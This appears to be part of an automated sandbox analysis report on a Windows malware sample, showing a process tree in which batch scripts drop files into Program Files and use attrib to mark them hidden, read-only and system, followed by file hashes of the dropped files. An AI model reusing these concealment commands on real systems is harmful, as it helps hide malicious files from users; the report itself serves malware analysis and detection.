                                                                                                                                                "C:\Windows\System32\cmd.exe" /C .\copy.cmd
                                                                                                                                                2⤵
                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                PID:992
                                                                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                                                                  attrib +r +h +s "C:\Program Files\WinWare\fav\fav.cmd"
                                                                                                                                                  3⤵
                                                                                                                                                  • Sets file to hidden
                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                  PID:4076
                                                                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                                                                  attrib +r +h +s "C:\Program Files\Windows\360SE.vbs"
                                                                                                                                                  3⤵
                                                                                                                                                  • Sets file to hidden
                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                  PID:4988
                                                                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                                                                  attrib +r +h +s "C:\Program Files\Windows\36OSE.vbs"
                                                                                                                                                  3⤵
                                                                                                                                                  • Sets file to hidden
                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                  PID:1540
                                                                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                                                                  attrib +r +h +s "C:\Program Files\WinWare\tool.cmd"
                                                                                                                                                  3⤵
                                                                                                                                                  • Sets file to hidden
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                  PID:4200
                                                                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                                                                  attrib +r +h +s "C:\Program Files\WinWare\360.cmd"
                                                                                                                                                  3⤵
                                                                                                                                                  • Sets file to hidden
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                  PID:1584
                                                                                                                                                • C:\Windows\system32\attrib.exe
                                                                                                                                                  attrib +r +h +s "C:\Program Files\WinWare\361.cmd"
                                                                                                                                                  3⤵
                                                                                                                                                  • Sets file to hidden
                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                  PID:3916
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C .\360.cmd
                                                                                                                                                2⤵
                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                PID:3612
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /C .\cpa.cmd
                                                                                                                                                2⤵
                                                                                                                                                  PID:3096
                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C del .\runonce.cmd
                                                                                                                                                  2⤵
                                                                                                                                                    PID:3576
                                                                                                                                                • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                                  C:\Windows\System32\WaaSMedicAgent.exe 30afcc931198594adcf2a56ed3e4e63e Vkfos/ACKE2Gm+2cgE91ZQ.0.1.0.0.0
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3992
                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      2⤵
                                                                                                                                                        PID:5116

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                    Replay Monitor

                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                    Downloads

                                                                                                                                                    • C:\Program Files\WinWare\360.cmd

                                                                                                                                                      Filesize

                                                                                                                                                      1KB

                                                                                                                                                      MD5

                                                                                                                                                      67240c407312315393794e9b65d1e8e5

                                                                                                                                                      SHA1

                                                                                                                                                      810b252670834678fdaa057b39e07985a029be7a

                                                                                                                                                      SHA256

                                                                                                                                                      0a29a7d11891968f5a4a6eb615e87a428d5e93c9a48908c7a1de7cf5a40acf22

                                                                                                                                                      SHA512

                                                                                                                                                      897bfb0b8b9ca3a315ff72b9c937aba50ddb88dd28ce3d8f156ccb01d008e566260e317364966fc3fe59a6f78017ad3924f32dd6d4b4a170550edc55b62bd3f2

                                                                                                                                                    • C:\Program Files\WinWare\361.cmd

                                                                                                                                                      Filesize

                                                                                                                                                      567B

                                                                                                                                                      MD5

                                                                                                                                                      feb810eaa38eb0890ad2034d322e4c79

                                                                                                                                                      SHA1

                                                                                                                                                      a7c7ddd0bd405b949ddbffed364269d145ee78e4

                                                                                                                                                      SHA256

                                                                                                                                                      e346f4ed81e3e7974c4a9978789fc08737abc4c7318f31d747b1ad23ce5bf800

                                                                                                                                                      SHA512

                                                                                                                                                      f96b5e8129ab8fd4703a2e4bddf4245e9c4a64a8d69663f755386021cb8fd34a75bd0fa53b4579145bf50be2948d9ae5d0f4bdb556ae73b4cc85e6a2130f5ab9

                                                                                                                                                    • C:\Program Files\WinWare\tool.cmd

                                                                                                                                                      Filesize

                                                                                                                                                      3KB

                                                                                                                                                      MD5

                                                                                                                                                      d7eece295819ac643894e11ec290fc16

                                                                                                                                                      SHA1

                                                                                                                                                      eaf976563ab1d54ddbb538846f21d80663c0482b

                                                                                                                                                      SHA256

                                                                                                                                                      00057dbc21e30cd983f4428934333acc1243bef2a7ae3e89ccfed37aaea35aef

                                                                                                                                                      SHA512

                                                                                                                                                      61602cd5b19a9f3d65c52ec8b393081949167496ec02420fe403e5ee63a3f59f29d367246af4a6ba3a6437ea46759315f6e1721fbd44f84878b548e61d261036

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\BUOTXRX9\suggestions[1].en-US

                                                                                                                                                      Filesize

                                                                                                                                                      17KB

                                                                                                                                                      MD5

                                                                                                                                                      5a34cb996293fde2cb7a4ac89587393a

                                                                                                                                                      SHA1

                                                                                                                                                      3c96c993500690d1a77873cd62bc639b3a10653f

                                                                                                                                                      SHA256

                                                                                                                                                      c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

                                                                                                                                                      SHA512

                                                                                                                                                      e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\~DF9AEC0885AD8D6657.TMP

                                                                                                                                                      Filesize

                                                                                                                                                      16KB

                                                                                                                                                      MD5

                                                                                                                                                      675530f093a381b9d716103cc64e852d

                                                                                                                                                      SHA1

                                                                                                                                                      d31b1f5dabbf5e3102ab3a2cf1ef7bf792062a3a

                                                                                                                                                      SHA256

                                                                                                                                                      6039fe7e9dc7f7ee41a30e60b5678f4185594b5028d75071b8f3199dd83126a7

                                                                                                                                                      SHA512

                                                                                                                                                      fdbf9b74b27fdf34166a0b896b7d0ddd8ff2dce02527e3524a72c80f2eb7fa329b8b640009ddb720d3dff4525897874392cbe630ab831d5df864832595ed8814

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\~DFEA39572759452BB5.TMP

                                                                                                                                                      Filesize

                                                                                                                                                      16KB

                                                                                                                                                      MD5

                                                                                                                                                      43bc4172a78afa2cec66005873ba88cc

                                                                                                                                                      SHA1

                                                                                                                                                      d9d39237ed9116cf267bce9d9cd5e9aff3d99240

                                                                                                                                                      SHA256

                                                                                                                                                      1c09546ff82f588cf5b77ccd9c9bcee59a866b008425e4aa0ad40f68323ce3b8

                                                                                                                                                      SHA512

                                                                                                                                                      3b184192903578fce1ad6251e5cbd98553fec2afb674ad81299266a3d67579f4c24782fad7fd95c656f892fcafac27a45543fa6397267b1c468a1c3f2121390b